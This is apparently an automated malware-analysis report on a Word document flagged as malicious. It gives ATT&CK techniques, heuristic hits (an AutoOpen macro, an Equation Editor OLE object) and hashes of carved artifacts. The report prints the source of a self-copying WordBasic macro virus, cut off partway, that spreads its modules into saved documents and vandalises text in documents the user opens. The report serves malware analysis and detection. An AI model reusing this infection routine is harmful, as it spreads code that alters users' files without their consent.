MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The presence of a high-severity heuristic for an AutoOpen macro and the critical ClamAV detection strongly indicate malicious intent. The VBA macro code, though partially truncated, suggests an attempt to infect the document or execute further malicious actions, likely involving the embedded Equation Editor OLE object. The macro's structure implies it's designed to run automatically upon opening the document, potentially leading to the download and execution of a second-stage payload.
Heuristics 6
-
Equation Editor OLE object high OLE_EQUATION_EDITOREmbedded OLE object word/embeddings/oleObject71.bin contains the Equation Editor CLSID, the legacy component exploited by CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798.
-
ClamAV: Doc.Trojan.Nop-5 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Nop-5
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Embedded OLE object medium OOXML_OLE_OBJECTDocument contains an embedded OLE object
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 32
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5019 bytes |
SHA-256: e040cf9088a23635f015629aaaca8261e4c26807e28632de04cdafbbecaaf83b |
|||
|
Detection
ClamAV:
Doc.Trojan.Nop-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "HelpAbout"
Rem ===============================================================
Rem Some Joke from this Macro.
Rem ===============================================================
Public Sub MAIN()
Attribute MAIN.VB_Description = "Отображает информацию о программе и номер версии"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.HelpAbout.MAIN"
On Error GoTo -1: On Error GoTo Halt
WordBasic.HelpAbout APPNAME:="Sucks!"
Halt:
Err.Number = 0
End Sub
Attribute VB_Name = "FileClose"
Rem ==============================================================
Rem Invecting module of this Macro.
Rem ==============================================================
Public Sub MAIN()
Attribute MAIN.VB_Description = "Закрывает все окна активного документа"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileClose.MAIN"
Dim W
Dim N$
Dim S$
On Error GoTo -1: On Error GoTo Halt
W = WordBasic.IsDocumentDirty()
Dim Dlg As Object: Set Dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs Dlg
If Dlg.Format <= 1 Then
If Dlg.Format = 0 Then
Dlg.Format = 1
WordBasic.FileSaveAs Dlg
End If
N$ = "Normal.Dot:"
S$ = Dlg.Name + ":"
WordBasic.MacroCopy N$ + "FileClose", S$ + "FileClose", 1
WordBasic.MacroCopy N$ + "DocClose", S$ + "DocClose", 1
WordBasic.MacroCopy N$ + "FileOpen", S$ + "FileOpen", 1
WordBasic.MacroCopy N$ + "HelpAbout", S$ + "HelpAbout", 1
WordBasic.MacroCopy N$ + "Internal", S$ + "AutoOpen", 1
WordBasic.SetDocumentDirty W
End If
Halt:
Err.Number = 0
WordBasic.FileClose
End Sub
Attribute VB_Name = "FileOpen"
Rem ==================================================================
Rem Destructive operations from this Macro.
Rem ==================================================================
Public Sub MAIN()
Attribute MAIN.VB_Description = "Открывает существующий документ или шаблон"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileOpen.MAIN"
On Error GoTo -1: On Error GoTo Halt
Dim Dlg As Object: Set Dlg = WordBasic.DialogRecord.FileOpen(False)
WordBasic.CurValues.FileOpen Dlg
WordBasic.Dialog.FileOpen Dlg
WordBasic.FileOpen Dlg
WordBasic.EditReplace Find:="Windows", Replace:="Sucks must die!", ReplaceAll:=1
Halt:
Err.Number = 0
End Sub
Attribute VB_Name = "DocClose"
Rem ==============================================================
Rem Invecting module of this Macro.
Rem ==============================================================
Public Sub MAIN()
Attribute MAIN.VB_Description = "Предлагает сохранить активный документ и закрывает активное окно"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.DocClose.MAIN"
Dim W
Dim N$
Dim S$
On Error GoTo -1: On Error GoTo Halt
W = WordBasic.IsDocumentDirty()
Dim Dlg As Object: Set Dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs Dlg
If Dlg.Format <= 1 Then
If Dlg.Format = 0 Then
Dlg.Format = 1
WordBasic.FileSaveAs Dlg
End If
N$ = "Normal.Dot:"
S$ = Dlg.Name + ":"
WordBasic.MacroCopy N$ + "FileClose", S$ + "FileClose", 1
WordBasic.MacroCopy N$ + "DocClose", S$ + "DocClose", 1
WordBasic.MacroCopy N$ + "FileOpen", S$ + "FileOpen", 1
WordBasic.MacroCopy N$ + "HelpAbout", S$ + "HelpAbout", 1
WordBasic.MacroCopy N$ + "Internal", S$ + "AutoOpen", 1
WordBasic.SetDocumentDirty W
End If
Halt:
Err.Number = 0
WordBasic.DocClose
End Sub
Attribute VB_Name = "AutoOpen"
Rem =================================================================
Rem StartUp Initialization.
Rem =====================================================
... (truncated)
|
|||
ooxml_oleobject_00.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject155.bin | 3072 bytes |
SHA-256: c9241e87674c2c7ed263c65f4ffa6fe6d87e836758d36118ac7dd787c69514ac |
|||
ooxml_oleobject_01.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject71.bin | 3584 bytes |
SHA-256: e405ecf051739ef5a789431c65877568c981da0084cfc0aa5c355c143979fb57 |
|||
ooxml_oleobject_02.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject126.bin | 3584 bytes |
SHA-256: 3346fa49f43a2589df6fdc88b62311f763cb242fb0a76f118fa4546e5f9e83a4 |
|||
ooxml_oleobject_03.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject188.bin | 3584 bytes |
SHA-256: deb903ed55cae59c3d579c14435ce995e9d91e5d24dd88d2664287b98f08f998 |
|||
ooxml_oleobject_04.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject87.bin | 3072 bytes |
SHA-256: 8b830d55ec202ac40f83707f1e2674824e2fcafda722b8216aa7a1527c28458b |
|||
ooxml_oleobject_05.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject116.bin | 3072 bytes |
SHA-256: 19a2b17e50e23a485ff28b97f1bd6b2d54dca33146df416341282208ec0ac475 |
|||
ooxml_oleobject_06.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject38.bin | 3072 bytes |
SHA-256: 8e9b4da15943c15aac2dfc8cb4fe7be89435d90b2849c4aed52bc3aa19d9e18f |
|||
ooxml_oleobject_07.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject113.bin | 3072 bytes |
SHA-256: 7c35d1ffc9c9b4a7730efd42824ba11834606603a2401ff569952d18ab0f50a0 |
|||
ooxml_oleobject_08.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject54.bin | 3584 bytes |
SHA-256: cb9569f0fa91764702e76c832716e91e9bff742f06f8a80c282784d48f9d38a1 |
|||
ooxml_oleobject_09.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject139.bin | 3072 bytes |
SHA-256: 7653ad6b8fa55c708c5c5a8224d3291e743e4608ef0b43e27c1cda6ebded849e |
|||
ooxml_oleobject_10.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject149.bin | 3072 bytes |
SHA-256: 2ba5967452f69c4c10d3dab80dceac345c038d07936cdf9de246df7a224ce92e |
|||
ooxml_oleobject_11.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject45.bin | 3072 bytes |
SHA-256: bcf88047cd6ecfc550c6b0570b5bb643358674d6f6ababf23f2e066ab92ff306 |
|||
ooxml_oleobject_12.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject182.bin | 3072 bytes |
SHA-256: 2cc9adba7cabf4058ddc4fdf3f7c6fbd5bec9d3f456d9c7dcaf0d33d51717a98 |
|||
ooxml_oleobject_13.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject67.bin | 3072 bytes |
SHA-256: 9f29e6ecdddde43caf382f75a4e589659900cbcef53821518a9b8f7cfbf361f9 |
|||
ooxml_oleobject_14.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject29.bin | 3072 bytes |
SHA-256: 3c24de16a44cba7269a68cdaebe2ad5b8de6844f29424ec4485f2ce149d4d853 |
|||
ooxml_oleobject_15.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject32.bin | 3072 bytes |
SHA-256: 78341d8f443c694997276818905f010119b82da50031aa1a8b33f392f8ec88ab |
|||
ooxml_oleobject_16.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject160.bin | 3072 bytes |
SHA-256: 71fe05e68cc6e9e9c4413be4dbf1d4f547ffcf0d80dcac9366e0e5f737bc14d7 |
|||
ooxml_oleobject_17.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject119.bin | 3584 bytes |
SHA-256: 5d973ed03049ce514df618a5c48523e5b96b90997a8666568657769ab51e838c |
|||
ooxml_oleobject_18.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject101.bin | 3584 bytes |
SHA-256: d1e4b3f2ed16b191238c9a19a3b7e8440e36354be3d558aec55831a6decc2641 |
|||
ooxml_oleobject_19.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject84.bin | 3584 bytes |
SHA-256: 1d9c73a995cdb767a306967bc1ab197682d64c7f2952757b9bce927b2192d0a1 |
|||
ooxml_oleobject_20.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject43.bin | 3584 bytes |
SHA-256: ea5925d79ede428a9eee143608991a530d6efb10240e71ab911d708e7c78091f |
|||
ooxml_oleobject_21.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject3.bin | 3072 bytes |
SHA-256: e85558e7951c79bed5fc5dc8ea6016c88c8b842fc215c3550eec687e9762513e |
|||
ooxml_oleobject_22.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject153.bin | 3072 bytes |
SHA-256: 546e8eb76c798b0bbca09014cf85cfd882aeef8c3672defcc6799e10c16a13f3 |
|||
ooxml_oleobject_23.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject158.bin | 3584 bytes |
SHA-256: d82f522b41213835b4edf3d49ab0ab1535a0b1f8603c3cc1d6abe120594ac309 |
|||
ooxml_oleobject_24.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject141.bin | 3584 bytes |
SHA-256: f4034febfcd159c1a9e4e40676fa479dbb5b08348d6f4a2b4df0bb80e540a1e8 |
|||
ooxml_oleobject_25.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject176.bin | 3072 bytes |
SHA-256: b8aa8526a55d27b1a05b360c5240ddada00f1b2838debea7105776c2dbf71bf0 |
|||
ooxml_oleobject_26.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject42.bin | 3072 bytes |
SHA-256: 0f849b23d2b11d7d2da3b37748b251b438d81adafd570e6a670865a621221668 |
|||
ooxml_oleobject_27.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject49.bin | 3584 bytes |
SHA-256: 3fa4dc1bfcdec1c9d9f230e8d4c2aa0e66ce9a42ded3c732c16b00cf0f05c8f0 |
|||
ooxml_oleobject_28.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject50.bin | 3072 bytes |
SHA-256: a731285d31e3aa0753f25de9959c2774dad663167f62b510c2e4c0b47347beef |
|||
ooxml_oleobject_29.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject14.bin | 3072 bytes |
SHA-256: 04994e4705eefb7361e5f3afb6cf42d4bf10e69d79279b701fc093267893a762 |
|||
ooxml_oleobject_30.bin |
ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject166.bin | 3072 bytes |
SHA-256: 41d9824d91bfbce76418cb776dab797d46d37df57856e08c9c4fe47f8dd9ae41 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.